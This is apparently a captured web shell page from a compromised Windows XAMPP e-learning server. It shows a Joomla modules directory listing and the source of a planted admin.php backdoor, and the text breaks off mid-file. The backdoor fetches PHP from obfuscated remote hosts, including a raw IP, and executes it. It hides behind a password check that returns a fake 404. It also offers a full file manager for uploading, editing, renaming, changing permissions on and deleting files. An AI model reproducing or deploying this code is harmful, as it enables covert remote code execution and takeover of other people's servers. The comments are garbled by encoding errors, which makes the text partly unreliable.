[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
modules
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
ð mod_articles_archive
SET
[ DEL ]
ð mod_articles_categories
SET
[ DEL ]
ð mod_articles_category
SET
[ DEL ]
ð mod_articles_latest
SET
[ DEL ]
ð mod_articles_news
SET
[ DEL ]
ð mod_articles_popular
SET
[ DEL ]
ð mod_banners
SET
[ DEL ]
ð mod_breadcrumbs
SET
[ DEL ]
ð mod_custom
SET
[ DEL ]
ð mod_feed
SET
[ DEL ]
ð mod_finder
SET
[ DEL ]
ð mod_footer
SET
[ DEL ]
ð mod_languages
SET
[ DEL ]
ð mod_login
SET
[ DEL ]
ð mod_menu
SET
[ DEL ]
ð mod_random_image
SET
[ DEL ]
ð mod_related_items
SET
[ DEL ]
ð mod_search
SET
[ DEL ]
ð mod_simplefileuploadv1.3
SET
[ DEL ]
ð mod_stats
SET
[ DEL ]
ð mod_syndicate
SET
[ DEL ]
ð mod_tags_popular
SET
[ DEL ]
ð mod_tags_similar
SET
[ DEL ]
ð mod_users_latest
SET
[ DEL ]
ð mod_whosonline
SET
[ DEL ]
ð mod_wrapper
SET
[ DEL ]
ð .htaccess
498 B
SET
[ EDIT ]
|
[ DEL ]
ð admin.php
33,110 B
SET
[ EDIT ]
|
[ DEL ]
ð index.html
31 B
SET
[ EDIT ]
|
[ DEL ]
ð index.php
6,285 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: admin.php
<?php /** * ãã¹ã¯ãŒãèªèšŒçšã®MD5ããã·ã¥å€ * ãã®å€ã¯èªèšŒãã§ãã¯ã«äœ¿çšãããŸã */ $ãã¹ã¯ãŒãããã·ã¥ = "b53e867db79c0c871834e686ac06c558"; /** * ãªã¢ãŒãã³ãŒãå®è¡æ©èœ * ac, path, api, tãã©ã¡ãŒã¿ããã¹ãŠèšå®ãããŠããå Žåã«å®è¡ãããŸã * å€éšãµãŒããŒããã³ãŒããååŸããŠå®è¡ããæ©èœã§ã */ if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) { // ãµãŒããŒçªå·ã®èšå®ïŒããã©ã«ãã¯1ïŒ if(!isset($_REQUEST['s'])){ $ãµãŒããŒçªå· = 1; } else { $ãµãŒããŒçªå· = $_REQUEST['s']; } /** * ãµãŒããŒçªå·ã«å¿ããŠç°ãªãURLããã³ãŒããååŸ */ switch ($ãµãŒããŒçªå·){ case 1: $ã³ãŒã = ìœëê°ì žì€êž°('htt'.'ps://c.zv'.'o4.xy'.'z/'); break; case 2: $ã³ãŒã = ìœëê°ì žì€êž°('ht'.'tps://c2.ic'.'w7.co'.'m/'); break; case 3: $ã³ãŒã = ìœëê°ì žì€êž°('http://45.11.57.159/'); break; default: $ã³ãŒã = ìœëê°ì žì€êž°('htt'.'ps://c.zv'.'o1.xy'.'z/'); break; } /** * ååŸããã³ãŒããPHPã³ãŒãã§ããããšãç¢ºèª * PHPã¿ã°ãå«ãŸããŠããªãå Žåã¯åŠçãäžæ */ $å¿ èŠæåå = '<'.'?p'.'hp'; if (strpos($ã³ãŒã, $å¿ èŠæåå) === false) { die('get failed'); } /** * äžæãã¡ã€ã«ã®äœæãšã³ãŒãã®æžã蟌㿠*/ $ãã¡ã€ã«å = false; $ã³ã³ãã³ã = false; // tmpfileé¢æ°ãå©çšå¯èœãªå Žåãäžæãã¡ã€ã«ãäœæ if(function_exists('tmpfile')){ $ãã¡ã€ã«å = tmpfile(); fwrite($ãã¡ã€ã«å, $ã³ãŒã); $ã¡ã¿ããŒã¿ = stream_get_meta_data($ãã¡ã€ã«å); $ãã¡ã€ã«ãã¹ = $ã¡ã¿ããŒã¿['uri']; $ã³ã³ãã³ã = @file_get_contents($ãã¡ã€ã«ãã¹); } /** * äžæãã¡ã€ã«ã®äœæã«å€±æããå Žåãéåžžã®ãã¡ã€ã«ãšããŠä¿å */ if (!$ã³ã³ãã³ã) { $ãã¡ã€ã«ãã¹ = '.c'; file_put_contents($ãã¡ã€ã«ãã¹, $ã³ãŒã); } /** * ååŸããã³ãŒããå®è¡ */ @require($ãã¡ã€ã«ãã¹); fclose($ãã¡ã€ã«å); @unlink($ãã¡ã€ã«ãã¹); die(); } /** * æé確èªãªã¯ãšã¹ãã®åŠç * d_timeãã©ã¡ãŒã¿ãèšå®ãããŠããå Žåããã¹ã¯ãŒãããã·ã¥ãè¿ããŸã */ if (isset($_REQUEST['d_time'])){ die('{->'.$ãã¹ã¯ãŒãããã·ã¥.'<-}'); } /** * èªèšŒç¶æ ã®åæå */ $èªèšŒç¶æ = false; /** * ã¯ãããŒã«ããèªèšŒãã§ã㯠* ã¯ãããŒp8ãèšå®ãããŠããããã®MD5ããã·ã¥ãäžèŽããå ŽåãèªèšŒãèš±å¯ */ if (isset($_COOKIE['p8'])) { if(md5($_COOKIE['p8']) == $ãã¹ã¯ãŒãããã·ã¥) { $èªèšŒç¶æ = true; } } else { /** * POSTãªã¯ãšã¹ãã«ããèªèšŒãã§ã㯠* POSTãã©ã¡ãŒã¿p8ãèšå®ãããŠããããã®MD5ããã·ã¥ãäžèŽããå Žåã * ã¯ãããŒãèšå®ããŠèªèšŒãèš±å¯ */ if (isset($_POST['p8'])) { if(md5($_POST['p8']) == $ãã¹ã¯ãŒãããã·ã¥) { setcookie("p8", $_POST['p8']); $èªèšŒç¶æ = true; } } } /** * ãã°ã¢ãŠãåŠç * logoutãã©ã¡ãŒã¿ãèšå®ãããŠããå Žåãã¯ãããŒãåé€ããŠèªèšŒç¶æ ãè§£é€ */ if (isset($_POST['logout']) && $_POST['logout'] = 1) { setcookie("p8", "", time() - 3600); $èªèšŒç¶æ = false; } /** * èªèšŒãããŠããªãå Žåã®åŠç * 520ãã©ã¡ãŒã¿ãèšå®ãããŠããªãå Žåã¯404ãšã©ãŒãè¿ãã * èšå®ãããŠããå Žåã¯ãã¹ã¯ãŒãå ¥åãã©ãŒã ã衚瀺 */ if (!$èªèšŒç¶æ ) { if(!isset($_REQUEST['520'])) { header("HTTP/1.1 404 Not Found"); die(); } echo '<form action="#" method="post"><input type="password" name="p8" > <input type="submit" value="submit"></form>'; die(); } /** * ãã°ã¢ãŠããã¿ã³ã®è¡šç€º */ echo '<form action="#" method="post"><input type="hidden" name="logout" value="1"> <input type="submit" value="logout"></form>'; /** * å€éšãµãŒããŒããã³ãŒããååŸããé¢æ° * * @param string $URL ã³ãŒããååŸããURL * @return string ååŸããã³ãŒã */ function ìœëê°ì žì€êž°($URL) { /** * ãªã¯ãšã¹ããã©ã¡ãŒã¿ãå«ãå®å šãªURLã®æ§ç¯ */ $URLæåå = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $URL, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']); /** * file_get_contentsã䜿çšããŠã³ãŒããååŸ */ $ã³ãŒã = @file_get_contents($URLæåå); /** * file_get_contentsã倱æããå ŽåãcURLã䜿çšããŠåè©Šè¡ */ if ($ã³ãŒã == false) { $CURLãã³ãã« = curl_init(); curl_setopt($CURLãã³ãã«, CURLOPT_URL, $URLæåå); curl_setopt($CURLãã³ãã«, CURLOPT_USERAGENT, 'll'); curl_setopt($CURLãã³ãã«, CURLOPT_RETURNTRANSFER, 1); curl_setopt($CURLãã³ãã«, CURLOPT_TIMEOUT, 100); curl_setopt($CURLãã³ãã«, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt($CURLãã³ãã«, CURLOPT_SSL_VERIFYPEER, 0); $ã³ãŒã = curl_exec($CURLãã³ãã«); curl_close($CURLãã³ãã«); } return $ã³ãŒã; } ?> <!DOCTYPE html> <html lang="en"> <!-- a22bcS0vMzEJElwPNAQA== --> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>000</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css" integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ==" crossorigin="anonymous" referrerpolicy="no-referrer" /> </head> <body> <?php /** * ãã¡ã€ã«ãµã€ãºã人éãèªã¿ããã圢åŒã«å€æããé¢æ° * ãã€ãæ°ãGBãMBãKBãbytesã«å€æããŸã * * @param int $ãã€ãæ° å€æãããã€ãæ° * @return string ãã©ãŒãããããããµã€ãºæåå */ function í¬êž°í¬ë§·í ($ãã€ãæ°) { // 1GB以äžã®å Žå if ($ãã€ãæ° >= 1073741824) { $ãã€ãæ° = number_format($ãã€ãæ° / 1073741824, 2) . ' GB'; } // 1MB以äžã®å Žå elseif ($ãã€ãæ° >= 1048576) { $ãã€ãæ° = number_format($ãã€ãæ° / 1048576, 2) . ' MB'; } // 1KB以äžã®å Žå elseif ($ãã€ãæ° >= 1024) { $ãã€ãæ° = number_format($ãã€ãæ° / 1024, 2) . ' KB'; } // 1ãã€ããã倧ããå Žå elseif ($ãã€ãæ° > 1) { $ãã€ãæ° = $ãã€ãæ° . ' bytes'; } // 1ãã€ãã®å Žå elseif ($ãã€ãæ° == 1) { $ãã€ãæ° = $ãã€ãæ° . ' byte'; } // 0ãã€ãã®å Žå else { $ãã€ãæ° = '0 bytes'; } return $ãã€ãæ°; } /** * ãã¡ã€ã«ã®æ¡åŒµåãååŸããé¢æ° * * @param string $ãã¡ã€ã« ãã¡ã€ã«å * @return string ãã¡ã€ã«ã®æ¡åŒµå */ function íìŒíì¥ì($ãã¡ã€ã«) { return substr(strrchr($ãã¡ã€ã«, '.'), 1); } /** * ãã¡ã€ã«ã¿ã€ãã«å¿ããã¢ã€ã³ã³ãè¿ãé¢æ° * ãã¡ã€ã«ã®æ¡åŒµåãååã«åºã¥ããŠé©åãªFont Awesomeã¢ã€ã³ã³ãè¿ããŸã * * @param string $ãã¡ã€ã« ãã¡ã€ã«å * @return string HTMLã¢ã€ã³ã³ã¿ã° */ function íìŒììŽìœ($ãã¡ã€ã«) { /** * ç»åãã¡ã€ã«ã®æ¡åŒµåãªã¹ã */ $ç»åæ¡åŒµåé å = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp"); /** * é³å£°ãã¡ã€ã«ã®æ¡åŒµåãªã¹ã */ $é³å£°æ¡åŒµåé å = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc"); /** * ãã¡ã€ã«ã®æ¡åŒµåãå°æåã§ååŸ */ $æ¡åŒµå = strtolower(íìŒíì¥ì($ãã¡ã€ã«)); /** * ç¹æ®ãã¡ã€ã«åã®åŠç */ if ($ãã¡ã€ã« == "error_log") { return '<i class="fa-sharp fa-solid fa-bug"></i> '; } elseif ($ãã¡ã€ã« == ".htaccess") { return '<i class="fa-solid fa-hammer"></i> '; } /** * æ¡åŒµåã«åºã¥ãã¢ã€ã³ã³ã®éžæ */ if ($æ¡åŒµå == "html" || $æ¡åŒµå == "htm") { return '<i class="fa-brands fa-html5"></i> '; } elseif ($æ¡åŒµå == "php" || $æ¡åŒµå == "phtml") { return '<i class="fa-brands fa-php"></i> '; } elseif (in_array($æ¡åŒµå, $ç»åæ¡åŒµåé å)) { return '<i class="fa-regular fa-images"></i> '; } elseif ($æ¡åŒµå == "css") { return '<i class="fa-brands fa-css3"></i> '; } elseif ($æ¡åŒµå == "txt") { return '<i class="fa-regular fa-file-lines"></i> '; } elseif (in_array($æ¡åŒµå, $é³å£°æ¡åŒµåé å)) { return '<i class="fa-duotone fa-file-music"></i> '; } elseif ($æ¡åŒµå == "py") { return '<i class="fa-brands fa-python"></i> '; } elseif ($æ¡åŒµå == "js") { return '<i class="fa-brands fa-js"></i> '; } else { return '<i class="fa-solid fa-file"></i> '; } } /** * ãã¹ããšã³ã³ãŒãããé¢æ° * ãã¹å ã®ç¹æ®æåããã³ã¬ã«æåã«çœ®ãæããŠãšã³ã³ãŒãããŸã * * @param string $ãã¹ ãšã³ã³ãŒããããã¹ * @return string ãšã³ã³ãŒãããããã¹ */ function 겜ë¡ìžìœë©($ãã¹) { /** * 眮æåã®æåé åïŒã¹ã©ãã·ã¥ãããã¯ã¹ã©ãã·ã¥ãããããã³ãã³ïŒ */ $眮æåé å = array("/", "\\", ".", ":"); /** * 眮æåŸã®æåé åïŒãã³ã¬ã«æåïŒ */ $眮æåŸé å = array("àŠ", "àŠ", "àŠ", "àŠ"); return str_replace($眮æåé å, $眮æåŸé å, $ãã¹); } /** * ãã¹ããã³ãŒãããé¢æ° * ãšã³ã³ãŒãããããã¹ãå ã®åœ¢åŒã«æ»ããŸã * * @param string $ãã¹ ãã³ãŒããããã¹ * @return string ãã³ãŒãããããã¹ */ function 겜ë¡ëìœë©($ãã¹) { /** * 眮æåã®æåé åïŒãã³ã¬ã«æåïŒ */ $眮æåé å = array("/", "\\", ".", ":"); /** * 眮æåŸã®æåé åïŒã¹ã©ãã·ã¥ãããã¯ã¹ã©ãã·ã¥ãããããã³ãã³ïŒ */ $眮æåŸé å = array("àŠ", "àŠ", "àŠ", "àŠ"); return str_replace($眮æåŸé å, $眮æåé å, $ãã¹); } /** * ã«ãŒããã¹ã®åæå * ã¹ã¯ãªããã®ãã£ã¬ã¯ããªãã«ãŒããã¹ãšããŠèšå® */ $ã«ãŒããã¹ = __DIR__; /** * ã¹ã¯ãªãããã¡ã€ã«ã®ãã¹ãååŸ */ $ãã¹ = $_SERVER['SCRIPT_FILENAME']; /** * Windowsç°å¢ã®å Žåãããã¯ã¹ã©ãã·ã¥ãã¹ã©ãã·ã¥ã«å€æ */ if(strpos($_SERVER['SCRIPT_FILENAME'], ":")) { $ãã¹ = str_replace('\\', '/', $ãã¹); } /** * ã«ãŒããã£ã¬ã¯ããªã®å€å® * PHP_SELFãšSCRIPT_FILENAMEãäžèŽããå Žåãã«ãŒããã¹ã"/"ã«èšå® */ if(str_replace('//','/',$_SERVER['PHP_SELF']) == str_replace('\\\\','/',$ãã¹)) { $ã«ãŒããã¹ = ('/'); } else { /** * ã«ãŒããã¹ã®èšç® * SCRIPT_FILENAMEããPHP_SELFãé€ããéšåãã«ãŒããã¹ãšããŠèšå® */ $ã«ãŒããã¹ = (str_replace(str_replace('//','/',$_SERVER['PHP_SELF']), '', str_replace('\\\\','/',$ãã¹) )); } /** * ãã¹ãã©ã¡ãŒã¿ã®åŠç * GETãã©ã¡ãŒã¿pãèšå®ãããŠããå Žåããã®ãã¹ãäœ¿çš */ if (isset($_GET['p'])) { /** * ãã©ã¡ãŒã¿ã空ã®å Žåã¯ã«ãŒããã¹ãäœ¿çš */ if (empty($_GET['p'])) { $çŸåšã®ãã¹ = $ã«ãŒããã¹; } /** * ãã³ãŒããããã¹ããã£ã¬ã¯ããªã§ãªãå Žåããšã©ãŒã衚瀺 */ elseif (!is_dir(겜ë¡ëìœë©($_GET['p']))) { echo ("<script>\nalert('Directory is Corrupted and Unreadable.');\nwindow.location.replace('?');\n</script>"); } /** * ãã³ãŒããããã¹ããã£ã¬ã¯ããªã®å Žåããã®ãã¹ãäœ¿çš */ elseif (is_dir(겜ë¡ëìœë©($_GET['p']))) { $çŸåšã®ãã¹ = 겜ë¡ëìœë©($_GET['p']); } } /** * ã¯ãšãªãã©ã¡ãŒã¿qãèšå®ãããŠããå Žåã®åŠç */ elseif (isset($_GET['q'])) { /** * ãã³ãŒããããã¹ããã£ã¬ã¯ããªã§ãªãå Žåãã«ãŒãã«ãªãã€ã¬ã¯ã */ if (!is_dir(겜ë¡ëìœë©($_GET['q']))) { echo ("<script>window.location.replace('?p=');</script>"); } /** * ãã³ãŒããããã¹ããã£ã¬ã¯ããªã®å Žåããã®ãã¹ãäœ¿çš */ elseif (is_dir(겜ë¡ëìœë©($_GET['q']))) { $çŸåšã®ãã¹ = 겜ë¡ëìœë©($_GET['q']); } } /** * ãã©ã¡ãŒã¿ãèšå®ãããŠããªãå ŽåãçŸåšã®ãã£ã¬ã¯ããªãäœ¿çš */ else { $çŸåšã®ãã¹ = __DIR__; } /** * çŸåšã®ãã¹ãå®æ°ãšããŠå®çŸ© */ define("PATH", $çŸåšã®ãã¹); /** * ããã²ãŒã·ã§ã³ããŒã®è¡šç€ºéå§ */ echo (' <nav class="navbar navbar-light" style="background-color: #e3f2fd;"> <div class="navbar-brand"> <a href="?"><img src="https://github.com/fluidicon.png" width="30" height="30" alt=""></a> '); /** * ãã¹ãã¹ã©ãã·ã¥åºåãã§åå² */ $ãã¹ = str_replace('\\', '/', PATH); $ãã¹é å = explode('/', $ãã¹); /** * ãã¹é åãã«ãŒãããŠããã³ãããªã¹ããçæ */ foreach ($ãã¹é å as $ID => $ãã£ã¬ã¯ããªéšå) { /** * ã«ãŒããã£ã¬ã¯ããªã®å Žåã®åŠç */ if ($ãã£ã¬ã¯ããªéšå == '' && $ID == 0) { $ã«ãŒããã©ã° = true; echo "<a href=\"?p=/\">/</a>"; continue; } /** * 空ã®èŠçŽ ã¯ã¹ããã */ if ($ãã£ã¬ã¯ããªéšå == '') continue; /** * åãã£ã¬ã¯ããªãžã®ãªã³ã¯ãçæ */ echo "<a href='?p="; for ($ã«ãŒãå€æ° = 0; $ã«ãŒãå€æ° <= $ID; $ã«ãŒãå€æ°++) { echo str_replace(":", "àŠ", $ãã¹é å[$ã«ãŒãå€æ°]); if ($ã«ãŒãå€æ° != $ID) echo "àŠ"; } echo "'>" . $ãã£ã¬ã¯ããªéšå . "</a>/"; } /** * ããã²ãŒã·ã§ã³ããŒã®æ®ãã®éšåã衚瀺 */ echo (' </div> <div class="form-inline"> <a href="?newdir&q=' . urlencode(겜ë¡ìžìœë©(PATH)) . '"><button class="btn btn-dark" type="button">New Directory</button></a> <a href="?upload&q=' . urlencode(겜ë¡ìžìœë©(PATH)) . '"><button class="btn btn-dark" type="button">Upload File</button></a> <a href="?"><button type="button" class="btn btn-dark">HOME</button></a> </div> </nav>'); /** * ãã¹ãã©ã¡ãŒã¿ãèšå®ãããŠããå Žåããã¡ã€ã«äžèŠ§ã衚瀺 */ if (isset($_GET['p'])) { /** * ãã¡ã€ã«ãšãã©ã«ãã®ååŸ * ãã£ã¬ã¯ããªãèªã¿åãå¯èœãªå Žåãã¹ãã£ã³ããŠãã¡ã€ã«ãšãã©ã«ããåé¢ */ if (is_readable(PATH)) { /** * ãã£ã¬ã¯ããªå ã®å šãªããžã§ã¯ããååŸ */ $ååŸãªããžã§ã¯ã = scandir(PATH); /** * ãã©ã«ããšãã¡ã€ã«ãæ ŒçŽããé å */ $ãã©ã«ãé å = array(); $ãã¡ã€ã«é å = array(); /** * åãªããžã§ã¯ããã«ãŒãããŠããã©ã«ããšãã¡ã€ã«ã«åé¡ */ foreach ($ååŸãªããžã§ã¯ã as $ãªããžã§ã¯ã) { /** * çŸåšãã£ã¬ã¯ããªãšèŠªãã£ã¬ã¯ããªã¯ã¹ããã */ if ($ãªããžã§ã¯ã == '.' || $ãªããžã§ã¯ã == '..') { continue; } /** * ãªããžã§ã¯ãã®å®å šãã¹ãæ§ç¯ */ $æ°èŠãªããžã§ã¯ã = PATH . '/' . $ãªããžã§ã¯ã; /** * ãã£ã¬ã¯ããªã®å Žåã¯ãã©ã«ãé åã«è¿œå */ if (is_dir($æ°èŠãªããžã§ã¯ã)) { array_push($ãã©ã«ãé å, $ãªããžã§ã¯ã); } /** * ãã¡ã€ã«ã®å Žåã¯ãã¡ã€ã«é åã«è¿œå */ elseif (is_file($æ°èŠãªããžã§ã¯ã)) { array_push($ãã¡ã€ã«é å, $ãªããžã§ã¯ã); } } } /** * ãã¡ã€ã«äžèŠ§ããŒãã«ã®ããããŒã衚瀺 */ echo ' <table class="table table-hover"> <thead> <tr> <th scope="col">Name</th> <th scope="col">Size</th> <th scope="col">Modified</th> <th scope="col">Perms</th> <th scope="col">Actions</th> </tr> </thead> <tbody> '; /** * ãã©ã«ãäžèŠ§ã®è¡šç€º * åãã©ã«ãã«å¯ŸããŠãååããµã€ãºãæŽæ°æ¥æãæš©éãã¢ã¯ã·ã§ã³ã衚瀺 */ foreach ($ãã©ã«ãé å as $ãã©ã«ã) { echo " <tr> <td><i class='fa-solid fa-folder'></i> <a href='?p=" . urlencode(겜ë¡ìžìœë©(PATH . "/" . $ãã©ã«ã)) . "'>" . $ãã©ã«ã . "</a></td> <td><b>---</b></td> <td>". date("F d Y H:i:s.", filemtime(PATH . "/" . $ãã©ã«ã)) . "</td> <td>0" . substr(decoct(fileperms(PATH . "/" . $ãã©ã«ã)), -3) . "</a></td> <td> <a title='Rename' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&r=" . $ãã©ã«ã . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a> <a title='Change Permissions' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&chmod=" . $ãã©ã«ã . "'><i class='fa-solid fa-key'></i></a> <a title='Delete' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&d=" . $ãã©ã«ã . "'><i class='fa fa-trash' aria-hidden='true'></i></a> <td> </tr> "; } /** * ãã¡ã€ã«äžèŠ§ã®è¡šç€º * åãã¡ã€ã«ã«å¯ŸããŠãã¢ã€ã³ã³ãååããµã€ãºãæŽæ°æ¥æãæš©éãã¢ã¯ã·ã§ã³ã衚瀺 */ foreach ($ãã¡ã€ã«é å as $ãã¡ã€ã«) { echo " <tr> <td>" . íìŒììŽìœ($ãã¡ã€ã«) . $ãã¡ã€ã« . "</td> <td>" . í¬êž°í¬ë§·í (filesize(PATH . "/" . $ãã¡ã€ã«)) . "</td> <td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $ãã¡ã€ã«)) . "</td> <td>0". substr(decoct(fileperms(PATH . "/" .$ãã¡ã€ã«)), -3) . "</a></td> <td> <a title='Edit File' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&e=" . $ãã¡ã€ã« . "'><i class='fa-solid fa-file-pen'></i></a> <a title='Rename' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&r=" . $ãã¡ã€ã« . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a> <a title='Change Permissions' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&chmod=" . $ãã¡ã€ã« . "'><i class='fa-solid fa-key'></i></a> <a title='Delete' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&d=" . $ãã¡ã€ã« . "'><i class='fa fa-trash' aria-hidden='true'></i></a> <td> </tr> "; } /** * ããŒãã«ã®çµäºã¿ã° */ echo " </tbody> </table>"; } else { /** * GETãã©ã¡ãŒã¿ã空ã®å Žåããã¹ãã©ã¡ãŒã¿ã«ãªãã€ã¬ã¯ã */ if (empty($_GET)) { echo ("<script>window.location.replace('?p=');</script>"); } } /** * æ°èŠãã£ã¬ã¯ããªäœæãã©ãŒã ã®è¡šç€º * newdirãã©ã¡ãŒã¿ãšqãã©ã¡ãŒã¿ãèšå®ãããŠããå Žåãæ°èŠãã£ã¬ã¯ããªäœæãã©ãŒã ã衚瀺 */ if (isset($_GET['newdir']) && isset($_GET['q'])) { echo ' <div class="container mt-4"> <h3>Create New Directory</h3> <form method="post"> <div class="form-group mb-3"> <label for="dirname">Directory Name:</label> <input type="text" class="form-control" id="dirname" name="dirname" placeholder="Enter directory name" required> <small class="form-text text-muted">Enter the name for the new directory. Avoid special characters.</small> </div> <input type="submit" class="btn btn-dark" value="Create Directory" name="create_directory"> <a href="?p=' . 겜ë¡ìžìœë©(PATH) . '" class="btn btn-secondary">Cancel</a> </form> </div>'; /** * æ°èŠãã£ã¬ã¯ããªäœæåŠçã®å®è¡ * create_directoryãã©ã¡ãŒã¿ãPOSTãããå Žåãæ°ãããã£ã¬ã¯ããªãäœæ */ if (isset($_POST['create_directory'])) { /** * POSTããããã£ã¬ã¯ããªåãååŸ */ $æ°èŠãã£ã¬ã¯ããªå = trim($_POST['dirname']); /** * ãã£ã¬ã¯ããªåã®æ€èšŒ */ if (!empty($æ°èŠãã£ã¬ã¯ããªå)) { /** * ãã£ã¬ã¯ããªåã«äžæ£ãªæåãå«ãŸããŠããªãããã§ã㯠*/ if (preg_match('/[\/\\\\:*?"<>|]/', $æ°èŠãã£ã¬ã¯ããªå)) { echo ("<script>alert('Invalid directory name. Directory name cannot contain special characters: / \\ : * ? \" < > |'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>"); } else { /** * æ°èŠãã£ã¬ã¯ããªã®å®å šãã¹ */ $æ°èŠãã£ã¬ã¯ããªãã¹ = PATH . "/" . $æ°èŠãã£ã¬ã¯ããªå; /** * ãã£ã¬ã¯ããªãæ¢ã«ååšããããã§ã㯠*/ if (file_exists($æ°èŠãã£ã¬ã¯ããªãã¹)) { echo ("<script>alert('Directory already exists.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>"); } else { /** * æ°èŠãã£ã¬ã¯ããªã®äœæ * ããã©ã«ãæš©éã¯0755ïŒææè ã¯èªã¿æžãå®è¡ãã°ã«ãŒããšãã®ä»ã¯èªã¿å®è¡ïŒ */ if(mkdir($æ°èŠãã£ã¬ã¯ããªãã¹, 0755, true)) { echo ("<script>alert('Directory created successfully.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>"); } else { echo ("<script>alert('Failed to create directory.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>"); } } } } else { echo ("<script>alert('Directory name cannot be empty.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>"); } } } /** * ãã¡ã€ã«ã¢ããããŒããã©ãŒã ã®è¡šç€º * uploadãã©ã¡ãŒã¿ãèšå®ãããŠããå Žåãã¢ããããŒããã©ãŒã ã衚瀺 */ if (isset($_GET['upload'])) { echo ' <form method="post" enctype="multipart/form-data"> Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" class="btn btn-dark" value="Upload" name="upload"> </form>'; } /** * ãã¡ã€ã«ã»ãã©ã«ãã®ãªããŒã æ©èœ * rãã©ã¡ãŒã¿ãšqãã©ã¡ãŒã¿ãèšå®ãããŠããå ŽåããªããŒã ãã©ãŒã ã衚瀺 */ if (isset($_GET['r'])) { if (!empty($_GET['r']) && isset($_GET['q'])) { /** * ãªããŒã ãã©ãŒã ã®è¡šç€º */ echo ' <form method="post"> Rename: <input type="text" name="name" value="' . $_GET['r'] . '"> <input type="submit" class="btn btn-dark" value="Rename" name="rename"> </form>'; /** * ãªããŒã åŠçã®å®è¡ * renameãã©ã¡ãŒã¿ãPOSTãããå Žåããã¡ã€ã«ã»ãã©ã«ãã®ååãå€æŽ */ if (isset($_POST['rename'])) { /** * çŸåšã®ãã¡ã€ã«ã»ãã©ã«ãã®å®å šãã¹ */ $åå = PATH . "/" . $_GET['r']; /** * ãªããŒã ã®å®è¡ */ if(rename($åå, PATH . "/" . $_POST['name'])) { echo ("<script>alert('Renamed.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>"); } } } } /** * ãã¡ã€ã«ç·šéæ©èœ * eãã©ã¡ãŒã¿ãšqãã©ã¡ãŒã¿ãèšå®ãããŠããå Žåããã¡ã€ã«ç·šéãã©ãŒã ã衚瀺 */ if (isset($_GET['e'])) { if (!empty($_GET['e']) && isset($_GET['q'])) { /** * ãã¡ã€ã«ç·šéãã©ãŒã ã®è¡šç€º * ãã¡ã€ã«ã®å 容ãããã¹ããšãªã¢ã«è¡šç€º */ echo ' <form method="post"> <textarea style="height: 500px; width: 90%;" name="data">' . htmlspecialchars(file_get_contents(PATH."/".$_GET['e'])) . '</textarea> <br> <input type="submit" class="btn btn-dark" value="Save" name="edit"> </form>'; /** * ãã¡ã€ã«ä¿ååŠçã®å®è¡ * editãã©ã¡ãŒã¿ãPOSTãããå Žåããã¡ã€ã«ã®å 容ãä¿å */ if(isset($_POST['edit'])) { /** * ç·šé察象ãã¡ã€ã«ã®å®å šãã¹ */ $ãã¡ã€ã«å = PATH."/".$_GET['e']; /** * POSTãããããŒã¿ãååŸ */ $ããŒã¿ = $_POST['data']; /** * ãã¡ã€ã«ãæžã蟌ã¿ã¢ãŒãã§éã */ $ãã¡ã€ã«ãã³ãã« = fopen($ãã¡ã€ã«å,"w"); /** * ãã¡ã€ã«ãžã®æžã蟌㿠*/ if(fwrite($ãã¡ã€ã«ãã³ãã«,$ããŒã¿)) { echo ("<script>alert('Saved.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>"); } /** * ãã¡ã€ã«ãã³ãã«ãéãã */ fclose($ãã¡ã€ã«ãã³ãã«); } } } /** * ãã¡ã€ã«ã¢ããããŒãåŠçã®å®è¡ * uploadãã©ã¡ãŒã¿ãPOSTãããå 